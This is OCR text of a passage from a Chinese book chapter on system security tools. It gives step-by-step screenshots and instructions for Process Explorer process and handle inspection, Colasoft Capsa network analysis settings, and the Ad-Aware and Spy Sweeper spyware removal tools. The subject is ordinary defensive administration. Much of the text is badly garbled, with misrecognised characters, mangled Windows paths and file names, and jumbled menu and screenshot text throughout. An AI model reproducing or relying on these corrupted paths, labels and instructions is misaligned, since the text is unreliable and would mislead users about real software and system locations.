svehost. 企 续 要 过 (O)… Ciri+M ou ro 


在 “进程 ”列表 中 选择 要 终止 的 进程 树 并 右 击 ， 在 
弹出 的 快捷 菜单 中 选择 “结束 进程 树 ”命令 。 
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ST IF 一 一 


今 公 公公 
STEP05: 设置 进程 的 处 理 颖 亲 和 性 


工具 全 攻略 


文件 (中 ”选项 (OQ) 视图 (V) 进程 (P) 查找 用 户 (U) En 
: 同 | 国 | 到 图 日 辐 | 略 XX| 的 全 |: 和 d |: 
Process 
| SYsten Idle Frocess 
日 | SYstem 
而 | Interrupts 
| smss. exe 
En Csrss. EXS 
日 下 | rininit. exe 
日 下 | services. exe 
日 茵 ] svchost. exe 
可 | TaiFrVSE. exe 
| ChsIvE. EXE 


Shift+Del 


四 3 引 Svchost. exe 
| svchost- exe 
etaskhostex. ex 
svYehost. exe 


| dasHost. exe 
|svchost. exe VirusTotal 检 查 (C) 


国 | svchost. exe 

| svchost. exe 属性 (P)… 

国 | svchost exe SO Ctrl+M 
号 spoolsyv. exe 2 : 


CPU 使 用 迹 : 68. 971 883% 


STEP06: ”打开 “处 理 器 杀 和 性 ”对 话 框 


处 理 恬 天 联 性 设置 控制 cpu 的 过 程 将 害 爷 许 执行 。 处 理 司 关联 
性 襄 半 控制 cpu 的 过 程 将 被 咒 计 执行 。 


名 cPU0 
区 cpPU 1 
加 CPU 2 
国 cPU3 
[CPU 4 
国 cPU5 


|CPU 6 


加 cPU7 


色 选 相应 的 复 选 框 ， 单 击 “ 确 定 ” 按 钮 ， 即 可 设 
置 哪个 CPU 执 了 该 进程 。 


Fa; 


右 击 需要 设置 的 进程 ， 在 弹出 的 快捷 菜单 中 选择 


“设置 权限 ”命令 。 


STEP07: 查看 进程 的 相应 属性 


Frocess 
下 | System ldle Process 
器 | SyYstem 
而 "| interrupts 
面 ss. ee 
"| srss. exe 
日 下 zininzit. exe 
日 下 | SEIVYIiCES. EKE 
日 svehost. exe 
而 | WmaiFrvaE. exe 
加 | ChsIME. exe 


Shift+ Del 


[elsvchost. exe 

svehost. exe 

etaskhoste 

量 lsvehost. exe 
而 dasHost. ex 

国 svchost. exe 


VirusTotal 检 查 (C) 


Dram Re | \ 


Esvchost. exe Ctrl+M 


STEP08: 打开 “属性 ”对 话 框 


字符 串 
性 能 国志 GPU 图 表 


映像 文件 


[加 


版 本 : 7.5.0.5266 
创建 时 Tue Feb 10 16:15:03 2015 
路 径 : 


C:\Windows\Wystem32MIMEVWSogouPY\WSogouImeEroker,exe | 浏览 各 ) 


命令 行 : 


|C:WINDOWSIEystem32VME\SogouPY\SogouImeBroker,exe" Embeddi 
工作 目录 : 


[ca Windows\system32\ | 
ee 


浏览 的 


分 进 svchost.exe{716) 

用 户 : WIN-O3GAS]VFLNWangye 

启动 时 9:05:26 2015/3/18 

注释 : || 

VirusTotal: | | | 提交 (5) 
DEP 数 据 执行 保护 : DEP (permanent) 
ASLR《【 随 机 地 址 空间 加 载 技 术 ) Enabled 


LO | | BO | 


右 击 需 要 查看 属性 的 进程 在 弹出 的 快捷 菜单 中 查看 进程 属性 。 


选择 “属性 ”命令 
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系统 安全 防护 工具 


STEP09: 查找 进程 STEP10: 打开 “Process Explorer 搜索 ” 
对 话 框 


Process Frocess PID Type Name 
System Idle Process K 
四 下 37steam 4 玉 
页 | Interrupts K 
En smss. EXE K 
而 省 CSrS5. EXE K 
日 wininit. exe K 
已 到 | services. exe K 
svehost. exe K 
| miPrvSE. exe K 
EK 
KE 
KE 2z7, 004 
SosouCloud. exe KE 15, 020 
TXPlatform exe K 2. 012 
K 27, 980 
K 44,. 104 
K 12, 192 
K 16, 528 
FlashUtil] MActive... KE 10, 176 
国 | svchost. exe K 8. 332 
蝇 国 |svehost. exe K 54, 524 
| taskhostex. exe 27, 668 
豆 | taskeng. exe 6. 196 
KE 17, 372 
bh EA | 
在 主 窗口 中 选择 “查找 ”一 “查找 进程 或 句柄 ， 在 文本 框 中 输入 “dll”， 单 击 “ 搜 索 ” 按 钮 。 
菜单 命令 。 


STEP11: ”查看 搜索 结果 STEP12: ”查看 句柄 


三 


文件 () 选项 (O) ”视图 (V) ”进程 (P) 章 找 中 H 
:加 | 国 | 国 国 口 加 | 车 X| 的 国 | 国 市 
Frocess 私有 字 节 
SosouCloud. exe 8, 860 Kk 
TXPlatform. EEE 920 X 
15, 440 K 
53, 298 x 
3,144 
21,972 xX 


Handle or DLL substring: 摧 索 (5) 取消 {C) 


Process 


WINWORD. EXE :\Windows\System32\oleaccrc. dil 
TINWORD. EXE :\Windows\System32\zh-CN‘\msctfuimanaser. dll. mu 
TINEORD. EXE :\Prosram Files\Microscfit 0fifice\Otficel5\205. 
TINNORD. EXE :\Prosram Files\Microscfit 0fficevOtfticel5V0AR- 
TINWORD. EXE :\Prosram FlilesvComnon Filesmicroscoft shared. 
WINWORD. EXE :\Prosram Files\Common Files\microsoft shared. 
TINWORD. EXE :\Windows\System32\zh-CN‘\kernel32. dil. mui 
TINWORD. EXE :\FProsram Files“Microsoft Office\0fficelD\FRO. 
VINWORD. EXE :\Prosram Files‘\Microsoft Office\0fficeli5"C38. 
TINWORD. EXE :\Windows\System32\msxmlér. dll 
TINNORD. EXE :Windozrs\VSystem32\zh-CNVKernelBase. dl11. mui 
TINEORD. EXE :\Windows\System32\zh-CN‘\msctf. dll. mui 
TINEORD. EXE :\Frosram Files\Microsoft 0ffice\VOtfficel5VTTEL。 
TINEORD. EXE :\ 款 件 安 荣 \SosouInput\7. 5. 0. 5266\Resource. dll 
VINWORD. EXE :\Prosrsm Files‘Common Files‘microsoft shsred. 
WINWORD. EXE :\Prosram Files‘“Common Files“\microsoft shared. 
TINWORD. EXE :\Frosram Files‘Common Files\microsoft shared. 
TTNEORT RR : lh ‘Proneram Filec\Minrncnft+ OffinecvnOPFFfince1hVeRN Y 
< > 


7 IFlashUtil] Active... 
| VmiPrvSE. exe 27, 072 K 
[svchost. exe t 3,276 Kk 


日 加 svchost. exe L 44, 112 KX 51,356 K 
taskhostex. EXE 23, 424 K 25, 892 K 
| taskens. exe 868 KX 5,152 KX 

[lschost. exe 47, 888 K 54, 944 区 


Name 

\RFC Control\OLE1C50。420822E84F876C42B003FBB 
\Default 

‘KnownDils 

N\3essionsN2\BaseNamed0bjects 


\DevicevHarddiskVolumnel\Tindors\3Systea32 

ANDevice\DeviceaApi 

\Device\HarddiskyeolunmelvTWindorsVTin3x3SVx86_ microsoft. windows. common 一 col 
‘Device"KsecDD 

ANDeviceNCNE 

“Device“HarddiskVolumeli\Windows‘\FinSxS"x86 microsoft. windows. common—eon 


列 出 本 地 计算 机 中 所 有 .dll 类 型 的 进程 。 单 击 “显示 下 层 窗 格 ” 按 钮 日 ， 在 “进程 ”列表 
中 单 击 某 个 进程 ， 即 在 下 面 的 窗 格 中 显示 该 进程 
包含 的 句柄 。 


3170 matching items, 
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合 人 他 他 


STEP13: ”查看 句柄 届 性 STEP14: ”打开 “属性 ”对 话 框 


具 全 攻略 


文件 (日 ”选项 (O) 视图 (V)】 进程 (P) 查找 |H ”| 用 户 (U) 帮助 (H) 
:加 | 国 | 加 四 口 图 | 叮 X| 风力 ” 关 半 和 句 柄 (QO | 


920 KX 
15, 440 K 
53, 296 

3,144 K 
21,972 K 


| WmiPrvSE. exe 2 Al 

Ea svehost. exe 3,528 Kk 

日 医 ] svchost- exe 43, 148 KK 
四 taskhostex. exe 22, 336 K 

| taskens. exe 812 kK 

蝇 @|svehost. exe . 47, 524 Kk 


Name 
\RFC Control\OLB1C50A420822584F878C42B003FBB 


\Default 
Directory ‘KnownDlls 


选择 “句柄 ”一 “属性 ”菜单 命令 。 在 “详情 ”选项 卡 中 可 看 到 该 句柄 的 详细 信息 
而 在 “安全 ”选项 卡 中 可 看 到 该 句柄 的 安全 信息 。 
STEP15: ”查看 系统 信息 STEP16: ”打开 “系统 信息 ”对 话 框 


Summary | CPU_ Memory [i/o | cpu 


文 #0 ee ji 进程 (P) 查找 H 用 户 (U) 帮助 (H) 


svehost. exe 

日 基站 svchost. exe 

taskhostex. exe 
En taskeng. exe 

lsvehost. exe 


\RFC Centycel\0LE1C50a420822E84F876C428003FBB 


在 工具 栏 中 单 击 “ 系 统 信息 ”按钮 到 。 可 看 到 当前 系统 的 各 种 详细 信息 。 
STEP17: ”设置 进程 和 句柄 显示 属性 STEP18: 打开 “设置 列 ” 对 话 框 


文件 (。 远 项 (O) 进程 (P) 吝 找 四 H 用 户 (U) 帮助 (H) 
: 贺 | 国 | 到 区。 显示 系统 信息 0).… Ctrltl 41 


, 显示 进程 树 (S) Ctrl+T 
1| Y | 显示 执 点 列 (H) 
定位 到 新 进程 (E) 
显示 未 命名 的 句柄 和 了 映射 (N) 
显示 所 有 用 户 的 进程 (W) 


进程 MO | Process Memo 进程 GPU 
旬 柄 | .NET 状态 栏 

进程 映像 s Image process performance 

选择 的 项 目 将 显示 在 Process Explorer 进程 句柄 视图 中 。 

必 进程 名 称 口 ] 窗 口 标题 

回 PID 口 ] 窗 口 状态 

[User Name 口 会 话 

描述 口 ] 命令 行 


公司 名 称 口 注释 

中 验证 签名 中 自 启动 位 置 

口 ] 版 本 记 ] VirusTotal 安 全 性 
忠 映 像 路 径 DEP 状态 

口 映 橡 类 型 (64 位 /32 位 ) DL Integrity Level 
L|Package Name [虚拟 化 

器 DPI DASLR 


显示 下 排 窗 口 (P) Ctrl+L 
下 排 窗口 显示 内 容 ( 


pm 在 “进程 映像 ”选项 卡 中 色 选 相应 的 复 选 框 ， 即 
可 显示 相应 的 属性 。 
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STEP19: 切换 至 “Process Performance” 
选项 卡 


选择 的 项 目 将 显示 在 Process Explorer 进程 句柄 视图 中 。 


[L ] CPU 使 用 率 列 表 
门 CFU 时 间 

忠 基 本 优先 级 
句柄 数 
上下文 切换 

Lj 上 下 文 切换 增 量 


CPU 使 用 谤 


LL CPU 使 用 这 
由 启动 时 间 
进程 时 间 线 
线程 

LCPU 周 期 


STEP20: 


L CPU 有 周期 增 量 


勾 选 “CPU 使 用 率 ” 复 选 框 和 “句柄 数 ” 复 选 框 。 


STEP21: 返回 主 窗 


人 二 


:加 | 国 | 到 旧 口 加 | 轩 XX | 的 @ | Nl 


Frocess 
SosouCloud. exe 
Ea TXPlatforn. exe 


Es 


7 FlashUti] Actiwe... 


面 -1 WmiFrvaE. exe 
四 svehost. exe 
日 下 引 svchost. exe 
a taskhostex. EXE 
量 Gsvechost. exe 
下 | dasHost. exe 


届 引 svchost. exe 
居 引 svchost. exe 
大 引 svchost. exe 
| svchost. exe 


Name 


8, 804 K 
920 K 
15, 440 EK 
53, 296 K 
3, 204 K 
21, 972 K 
2 652 K 
10, 544 K 
3, 528 K 
44, 736 K 
-4 革 : 旺 - 
48, 764 K 
3, 228 K 
3. 344 K 
11 276 K 
7 732 K 


系统 安全 防护 工具 


切换 至 “句柄 ”选项 卡 


7 
er 


ou | Ne | RE 


ee Process Explorer 进程 句柄 视图 


Type 

Name 

Handle Value 
[| Access Mask 
File Share Flags 
[| Object Address 


设置 显示 进程 视图 中 的 列 ， 这 里 勾 选 “Type”“Name” 
“Handle Value” 和 “File Share Flags” 复 选 框 , 单 击 
“确定 ” 按钮 。 


a 
天 站 


T= 


15, 008 KK 
2,016 K 
27, 988 KK 
49, 716 K 
12, 200 EK 
16, 664 KK 
10, 216 Kk 
16, 532 K 
8. 480 K 
51. 704 EK 
25, 956 Ek 
58, 044 F 
10, 332 K 
9 244 K 
16, 376 EK 
20. 152 K 


“REC Controlv0LE1C504420822E84F8TGC42B003FBB. 


“Default 
“KnownDlls 


4504 
932 


1684 
1016 
1072 
1112 


Handle 


0x294 
Oxa4 
0x4 


Share Flass 


“Sessions“2“BaseNamedObjects 


“Device“HarddiskVolumel‘\Windows “System32 

‘Device\Deviceapi 

‘Device‘HarddiskVolumel‘Windows ‘Win3x3\x96 microsoft. windows. common-con. .. 
Device\KsecDD 

“Device\CNEe 

“Device"“HarddiskVolumeli‘Windows‘Win3x3\xd6 microsoft. vindows. comon-con. .. 
“Device“\HarddiskVolumel‘Window=s"“Systemd2"Macromed“Flash\FlashUtil Mctiv... 
“Device“\HarddiskVolumel‘\Windows"“Systemd2"“stdole2. tlb 


CPU 使 用 烹 ; 99.98316796 提交 更 收 ; 74.22% 进程 数 : 88 牺 理 内 存 使 用 迹 : 66.73% 


查看 设置 属性 后 显示 的 进程 。 
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合 人 他 他 


11.1.2 


工具 全 攻略 


Colasoft Capsa 是 


可 以 捕获 本 地 和 网 络 中 的 IP 数据 包 ， 并 进行 


STEP01: 打开 “Colasoft Capsa Demo” 主 


分 析 、 


网 络 检测 工具 (0lasoit Capsa 


窗口 


Colasoft Capsa ?7 Enterprise (Demo) 


I Home Page ATech Forum 全 About 


Capture Replay 


Name ip 
Wired Network Adapter(s) 
口 本 地 连接 


Packets/s 


192.168.1.10 56 


| Ea 
3 


Network 
Profile 3 
(10M) 


1 [于 
ak 


Network 
Profile 4 
(2M) 


Profile 2 
(100M) 


Profile 1 
(1000M) 


全 | 加 | 加 | | 


HTTP Analysis Email Analysis DNS Analysis FTP Analysis IM Analysis 


Security 


Full A is |Traffic Monit 
nalysis |Traffic Monitor Re 


款 基 于 TCP/IP 协议 的 网 络 监测 、 嗅 探 、 分 析 工 具 。 使 用 该 工具 ， 
监测 。 该 工具 的 使 用 步 


骤 如 下 。 


和 Adapter 
No adapter selected 
Capture Filter 多 


No filter selected, accept all packets, 

Set Capture Filter 
Network Profile 人 
Network Profile 1 


Analysis Profile «yd 


Full Analysis: 
To provide comprehensive analysis of all the 
applications and network problems 


Plugin module loaded: 
MSN 

Yahoo Messenger 
ARP 


Data Storage [7 


Packet output disabled 
Log output disabled 
Set Data Storage 


可 看 到 本 机 计算 机 IP 地 址 以 及 网 络 连接 情况 。 双 击 “Full Analysis” 按 钮 。 


STEP02: 修改 分 析 简 介 


Modify Analysis Profile 


Name: Full Analysis 


Description: ”To provide comprehensive analysis of all the applications and network 


problems 


| Change 


Analysis Module: 

Description 

Analysis MSN Protoco| 
Analysis Yahoo Protocol 
Analysis ARP/RARP Protocol 
Analysis DNS Protocol 
Analysis SMTP/POP3 protocol 
Analysis FTP protocol 
Analysis HTTP Protocol 
Analysis ICMPv4 protocol 


| Name 
MSN 
Yahoo Messenger 


司 轩 回国 回国 加 大 


一 一 一 一 一 
勾 选 相应 的 复 选 框 后 ， 单 击 “Next ”按钮 。 
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STEPO3: 


TanaysisObjsc 
packet Display Buffer 
Log Settings 
Diagnosis Settings 
Tab View 


在 TI Object” 
选择 要 分 析 的 对 象 。 


框 ， 


分 析 向 介 选 项 


Analysis Object Protocol Details 
加 Network Protocol -~ 

回 Physical Address 50 
EB Local IP Address 50 
Remote IP Address 1.000 
回 physical Group | 
回 IP Group 

回 physical Conversation 

EB Ip Conversation 


Max Object Count 


Et] TCP Conversation 
回 UDP Conversation 


This function is usable only when the capture is stopped. 


Reset 


ES 


选项 卡 中 勾 选 相应 的 复 选 
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系统 安全 防护 工具 


STEPO4: 


Analysis Object 
一 
“a 

Log Setting5 
Diagnosis Settings 
Tab View 


数据 包 显示 缓冲 区 


Packet Display Buffer 


加 Enable packet display buffer 


Buffer size; 16 
Discard oldest packets (circular buffering) = 


Note: If you change the buffer size, the packet buffer will be reset and all previously stored 
packets will be lost 


When buffer is full: 


STEPOS: 


日 记 设 置 


Analysis Object 
Packet Display Buffer 


Diagnosis Settings 


Tab View 


Display Buffer 


回 MSN Log 
加 Diagnosis Log 
回 DNS Log 
Email Log 
| 回 HTTP Log 
回 YAHOO Log 
回 Frp Log 


回 Glebal Log 


Output Settings 


| Name 
图 MSN Log 
加 Diagnosis Log 


贺 YAHOO Messenger Log 


设置 日 志 类 型 。 


设置 数据 包 缓 冲 区 的 大 小 。 


STEP06: 诊断 设置 STEP07: 返回 主 窗口 


Analysis Object 
Packet Display Buffer 
Log Setings 


Diagnosis Settings 


避 陶 Application ^ 
回 DNS Server Slow Response 
- 回 DNS Host or Domain Does Not E 
[WH DNS Server Error 
回 SMTP Server Slow Response 至 
— 回 SMTP Suspicious Conversation 
-- 回 POP3 Suspicious Conversation 
回 SMTP Server Returned Error 
- 回 POP3 Server Slow Response 
POP3 Server Returned Error 
FTP Server Slow Response 
FTP Suspicious Conversation 
- 回 FTp Server Returned Error 
回 HTTP client Error 
回 HTTP Suspicious Conversation 
- 回 HTTP Request Page Not Found 
回 HTTP Server Returned Error 
同 HTTP Server Slow Response 
1 Transport 
4 


Tab Vew 


Profile 4 
(2M) 


Profile 3 
(10M) 


Profile 2 
(100M) 


The response time from the server is 
equal to or higher than the Slow 
Response Time threshold., 


Possible Reason And Resolution 
1. The route between client and DNS 
server is very slow, 


2. The DNS server is overloaded, 


3. The DNS server is attacked. 


图 力图 四 外围 图 


设置 诊断 分 析 的 各 个 属性 。 双击 “Network Profile 1 ( 1000M ) ”按钮 。 


STEP08: 配置 管理 -网 络 配置 STEP09: ”节点 组 


General Settings 
Node G' 
EN Network Profile Settings 


Name Table Name Table 


Local Segqment 
: 加 Local Host 
日 - 讽 Local Subnet 
CB 192.168.1.0/24 


Alarms s Network Profile 1 Alarms 


Only editable nodes displayed. 
Local Segment 
Enter physical addresses, physical address masks of 
the group. One per line. 


加 Enable Countny Group 


Eo Eee Gees 


在 “General” 选 项 卡 中 设置 网 络 配置 的 名 称 和 网 
络 带宽 。 


可 以 添加 、 导 入 、 导 出 节点 组 。 


32/ 


客 志 
-区 -工具 人 攻 了 


全 人 人 他 
STEP10: ”查看 各 个 协议 及 其 对 应 的 端口 STEP11: ”打开 “普通 协议 ”对 话 框 


Heme Page Tecmh Ferum {OD About 


Type: |TCP - Fikters: |AllProtocols > Search: 


cr 
Name Alias Port 
Name Pp 
Wired Neteork Adap4erf5) 
门 反共 法 了 季 192.168.1.10 5 


TT Tunnel 
TEd 


T Common Management Information Pr... 64 Built-in 


了 common Management Information Pr CMIP-Man 163 Built-in 
了 了 Simple File Transfer protoco SFTP 1 Buik-in 
了 了 Route Access Protocol 3 Built-in 
TT Resource Location Protocol 39 Built-in 
Te Remote Access Dall-In User Service Radius 812 Built-in 
了 了 RADIUS Dynamic Authorization 3799 Built-in 
SSL shell SShell Built-in 
TT Host Name Server Nameserver 

TT Login Host Protocol Tacacs 

4 


在 主 窗口 中 单 击 按钮 ， 在 弹出 菜单 中 选择 “Local ”进行 添加 、 修 改 、 导 入 和 导出 协议 等 操作 。 如 果 要 
Engine Settings”> “Custom Protocol” 菜 单 命令 。 ”对 某 个 协议 进行 修改 ， 则 先 在 “协议 ”列表 中 选中 
该 协议 ， 单 击 “Modify” 按 钮 。 


STEP12: 打开 “Modify Protocol” 对 话 框 STEP13: 返回 “Customize Protocol” 对 话 框 
一 一 


FF 二 = 
Type: |TCP | Fiters: AllProtocols ~ Search: 


Modify Protocol 


Name Alias Port 
了 了 Tunnel Tunne 604 
TT Ed Ech' 了 


T Common Management jnformation Pr.， CMIP-Agent 64 Built-in 


Protoco| Common Management ] 


Short Name: | CMIP-Man T Common Management Information Pr... CMIP-Man 163 Built-in 
了 Simple File Transfer Protoco SFTP 1 Buik-in 
T Route Access protocol RAP 3 Buik-in 


了 了 Resource Location protocol RLP 39 Built-in 


Port Number: 加 坟 ) 
TT Remote Access Dail-In User Service Radius 812 Built-in 
了 了 RADIUS Dynamic Authorization Radius-dynau... 3799 Built-in 
了 了 SSL shell SShell Built-in 
了 | 

了 


了 了 Host Name Server Nameserver 


Use","to separate multiple 
value. eg: 80,83,85 


TT Login Host Protocol Tacacs 


* 


修改 协议 。 如 果 想 导出 协议 文件 ， 则 须 在 该 对 话 框 中 单 击 
“Export” 按 钮 。 

STEP14: 打开 “另存 为 ”对 话 框 SIEBISI 查看 提示 信息 

全 Customized Protocols | 


保存 在 0): 国文 档 
我 的 文档 (18) 


办 
EE 


,Ri 


360js Files AppData bangbangcs Corel 


| Export successfully! 


VideoStudio MW 


有 


文件 名 四 -| [5 
保存 类 型 (T): Custom Protocol Files(*.cscpro) v 取消 


可 看 到 成 功 导 出 的 提示 信息 ， 单 击 “确定 ” 按 
按钮 。 钮 即 可 。 
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系统 安全 防护 工具 


STEP16: 返回 主 窗口 STEP17: 打开 “本 地 引擎 设置 ”对 话 框 


Home Page WTemh Farun {DAbout 


“Display Format 四 
3 


~ ET 


Name P 
3 Wired Neimwcrk Adapierls) 
门 地 她 流 恒 i92.164.1.10 5 


|B, KB, MB. GB, TB 


ib, Kb, Mb, Gb, Tb 


Bps, KBps, MBps, GBps, TBps ~ 


[bps, Kbps, Mbps, Gbps, Tbps -| 


单 击 @ 按钮 ， 在 弹出 菜单 中 选择 “Local Engine ”设置 显示 网 络 数 据 的 具体 格式 。 


Settings”> “Format” 菜 单 命令 。 


间谍 软件 的 主要 危害 是 严重 干扰 用 户 使 用 互联 网 ， 比 如 推广 弹出 式 广 告 、 影 响 用 户 网 
上 上 购物、 干扰 在 线 聊 天 、 欺 驴 用 户 浏 览 搜索 引擎 引导 网 站 等 ， 同 时 还 有 可 能 导 和 化 计算 机 速 
及 变 慢 、 网 络 突然 断 开 等 情况 出 现 ， 这 主要 是 因为 间谍 软件 会 占用 大 量 系统 资源 


17;2.1 间谍 广告 杀 于 AdAWare 


系统 安全 工具 Ad-Aware 可 以 扫描 用 户 计算 机 中 由 网 站 所 发 送 的 广告 跟踪 文件 和 相关 文件 ， 
且 安全 地 将 它们 删除 ， 使 用 户 不 会 为 此 而 泄露 自己 的 隐私 和 数据 。 它 能 够 搜索 并 删除 的 广告 服 
务 程 序 包括 : Web3000、Gator、Cydoor、Radiate/Aureate、Flyswat、Conducent/ TimeSink 和 
CometCursor 等 。 该 软件 的 扫 摘 速度 相 当 快 ， 可 生成 详细 的 报告 并 在 上 甩 上 腿 间 将 这 些 程序 删除 。 
具体 的 操作 步骤 如 下 。 
STEP01: 运行 Ad-Aware STEP02: ”进入 扫描 操作 窗口 


v 浏览 昭 吉 持 

， v 去 行 v 迫 踪 cook 

Ad-Watch Livel 快速 扫 措 是 一 种 快速 系统 检 在 , 它 只 扫 撕 您 条 v Windows ; vRoota 

未 执行 ) 实时 保护 : 开 统 的 最 关键 区 域 存档 

是 后 扫描 日 期 ， 是 后 扫描 楼 式 及 新 于 件 ES 全 
文 v 反 病 毒 引 于 

来 自 Lavasoft 的 新 闻 区 Y 基于 行为 的 个 测 

协 取 我 们 下 接 投递 到 您 收 件 第 的 月 度 时 平 通 讯 ， 其 中 包括 有 价值 的 行业 新 闻 、 有 站 

的 事件 和 图 片 以 及 莱 自 Lavasoft 的 是 新 新 闻 和 消 县 。 


设备 扫描 日 得 加 计 更 多 
即将 进行 的 预定 扫 拭 筑 理 您 的 许可 证 7》 二 要 支持 ? 
上 后 


进入 Ad -Aware 主 窗口 并 单 击 “ 扫 描 系 统 ” 按钮 。 团 : 可 选择 三 种 扫描 方式 。 单 击 “现在 扫描 - 
按钮 。 


© 为 了 维持 计算 机 系统 的 安全 性 和 稳定 性 ， 移 除 间谍 软件 和 广告 软件 应 该 是 
提示 


一 项 持续 进行 的 工作 ， 因 此 用 户 最 好 能 够 定期 对 系统 进行 扫描 。 
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ST IF 一 一 


工具 全 攻略 


信人 
STEP03: 正在 扫描 


内 Ad-Aware 


Ad-Aware® Free 
PS AR ed 
计划 任务 程序 


扫描 樟 式 : 快速 扫描 
扫描 时 间 : 00 : 01 : 36 


AdWatch 


洒 撕 的 对 急 : 28423 
侦 测 的 对 象 : 1 


罩 设 画 系统 恢复 点 


(3 为 何 Lavasoft 建议 该 操作 ? 


现在 执行 操作 


显示 扫描 时 间 、 扫 搞 的 对 象 的 信息 。 


STEP05: 返回 扫描 窗 


关键 区 域 
”正在 运行 的 程序 


Ad-Watch Ei 


Y 浏览 巾 二 持 
”人 迫 踪 cookie 


单 击 窗口 右 侧 的 “设置 ”按钮 。 


STEP07: 切换 至 “扫描 ”选项 卡 


合 Ad 一 Amare 


fi TT OT VN 
| 更 新 
扫描 概要 文件 设 莫 
扫描 概要 文件 
默认 要 要 文件 


国 同谋 黑 件 启发 式 逻辑 
国 存档 
Ed 胱 过 大 于 以 下 尺寸 的 文件 


| 基于 行为 的 个 测 
竺 应 


中 度 
严 术 


勾 选 要 扫描 的 文件 
以 及 文件 夹 。 
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要 扫描 的 文件 夹 : “| 


要 扫描 的 区 域 
图 关键 区 域 
辆 正在 运行 的 故 序 
Windows 注册 去 
图 LSP 
ADS 


辆 
图 主机 文件 
加 MRU 
图 浏览 中 劫持 
辆 迫 踪 cookie 
回 移 除 Cookie 时 ,关闭 
浏览 昭 


单 击 “ 确 定 ” 


按钮 。 


对 常规 、 侦 测 层 以 及 
警告 和 通知 进行 设置 。 按钮 。 


STEP04: 查看 扫描 结果 


合 上 dk&ware 


Ad-Avare2 Free 


扫描 榜 式 : 快速 扫描 扫描 的 对 银 : 28423 
扫描 时 间 : 00 : 01 : 36 个 测 的 对 象 : 1 


类 到 
Privacy Object 


回 设 匡 系统 恢复 点 


若 要 清除 扫描 出 的 所 

有 对 象 , 则 需要 在 “操作” 
栏 选择 “ 移 除 所 有 "命令 。 
STEP06: 进入 选项 设置 窗口 


合 &d-Aware 


单 击 “ 现 在 执行 
操作 ”按钮 。 


AAd-Anararo® Froa 


〇 不 发 送 文件 到 ThreatWork 
个 后 台 自 动 发 送 文 件 
歌 忻 和 罕 文 文件 更 新 @ 打 开 ThreatWork 窗口 


导入 保存 的 定义 文件 : 代理 服务 器 设 理 
| 5 入 . | 按 下 以 下 的 按 饵 以 显示 代理 服务 中 设 十 


代理 服务 跟 设 于 


芍 取 更 新 
回 兰 不 攻 自 动 检查 更 新 


在 “更 新 ”选项 卡 中 可 进行 ” 国 单 击 “确定 ' 
“信息 更 新 ”等 更 新 设置 。 按钮 。 
STEP08: 切换 至 “Ad-Watch Livel” 选项 卡 


局 hd—A¥are 


人 四 -Asar 一 me 了 rm 一 
更 新 扫 措 


常 坑 侦 测 层 
口 同 谨 软件 启发 式 惧 辑 
反 病毒 引 全 
Ad-VWatch Livel 模块 基于 行为 的 估 测 
阔 进程 保护 轰 度 
] 往 几 表 保 护 
下] 网 络 保护 


着 告 和 通知 

您 希望 如 何 通知 有 关 Ad-Watch Livel 事件 的 信息 ? 
中 〇 通知 我 所 有 事件 

人 @ 只 需 通 知 我 重要 事件 

中 请 不 要 通知 我 ,自动 处 理 所 有 估 测 到 的 事件 


单 击 “确定 ” 


< 第 17 章 


县 | 3 条 
系统 安全 防护 工具 

STEP09: 切换 至 “外 观 ” 选 项 卡 

| | 常规 
法 把 | 器 隐 站 任务 栏 图 标 从 以 下 的 下 拉 列 表 中 选择 您 的 皮肤 。 关闭 

AdAware 然 后 重新 打开 它 ,可 以 看 到 更 改 。 

| | 请 

| = 对 常规 、 语 言 、 皮 肤 项 进行 设置 。 


简体 中 文 v 


单 击 “ 确 定 ” 按 钮 。 


在 操作 过 程 上 ，Ad-Aware 跟 一 般 的 病毒 清除 软件 没有 太 大 区 别 ， 主 要 包括 扫 摘 及 清除 
操作 两 大 部 分 。 无 论 是 间谍 软件 还 是 广告 软件 ， 都 会 高 度 危 害 计算 机 系统 的 安全 性 及 稳定 
性 ， 所 以 都 有 移 除 的 必要 。 由 于 不 同 的 间 诛 软件 或 广告 软件 设 定 也 各 不 相同 ， 因 此 移 除 间 
谍 软 件 或 广告 软件 并 不 是 一 项 稍 单 的 工作 ， 即 使 利用 反问 谍 软 件 或 反 广 告 软件 ， 也 不 代表 
能 完全 将 其 成 功 移 除 。 

有 时 可 能 会 因为 该 间谍 软件 或 广告 软件 被 部 分 终止 , 而 令 系 统 在 启动 时 出 现 错误 信息 。 
此 时 ， 用 户 就 必须 进行 手动 清除 相关 操作 。 比 如 ， 在 利用 Ad-Aware 移 除 一 个 名 为 
“BookedSpace ”的 广告 后 , 就 发 现 系统 在 每 次 局 动 时 都 会 提示 找 不 到 “bs3.dll” 及 “bsxx5.dll” 
的 信息 。 这 样 就 必须 手动 移 除 Ad-Aware 未 能 完全 清除 的 设 定 ， 问 题 才 能 得 以 解决 。 由 于 手 
动 移 除 步 骤 都 较 复 杂 ， 因 此 用 户 在 进行 操作 时 一 定 要 主 蛋 。 


17.2.2 ”用 $py SWeeper 清除 间谍 软件 


当 大 家 安 闻 了 东 些 免费 的 软件 或 浏览 东 个 网 站 时 ， 都 可 能 使 间 读 软件 潜 入。 黑客 除 监 
视 用 户 的 上 网 习惯 “如 上 网 时 间 、 经 疝 浏览 的 网 站 以 及 购买 了 什么 商品 等 ) 外， 还 有 可 能 
记录 用 户 的 信用 卡 账 号 和 密码 ， 这 给 用 户 安全 市 来 了 重大 隐患 。Spy Sweeper 是 一 歼 五 星 级 
的 间谍 软件 清理 工具 ， 还 提供 主页 保护 和 Cookies 保护 等 功能 。 有 具体 的 操作 步骤 如 下 。 


STEP01: 运行 Spy Sweeper STEP02: 切换 至 “Sweep” 选 项 
: 运行 Spy p 至 eep 页 让 
© webroot Antivirus with Spy Sweeper he @ webroot Antivirus with Spy Sweeper 国 加 加 
ee Mreat sam Subocrpton inactive 
E> prove vow protectan 哮 options 
Be XK Last full sweep: Never 。 Block unwanted traffic Sweep | shields | Update | program | 
Next sweep: 2013/11/22 1:00 se Clean your System 
园 _shields Items detected to date: 0 。 Back up your files Sweep Type 
| Sweep Now Upqrade Now 
ick Sweep is a light sweep that maximiz es use of your computer's 
Subscription i Cessing power to sweep faster. It will s :earch only locations where 
Shields | Ee curity issues are commonly found. 
。W Shields: 12 of 12 Recommended Shields are ON Check Status 
Items Blocked: 0 About My Subscription 
Updates Gamer Mode [OFF] 


/ Last check: Today [ Turn Gamer Mode on 


Automatic Updates: ON Alerts 
Check for Update 


Vv AlUserAccounts 
wv ”Direct Disk Sweeping 
w” Rootkits 


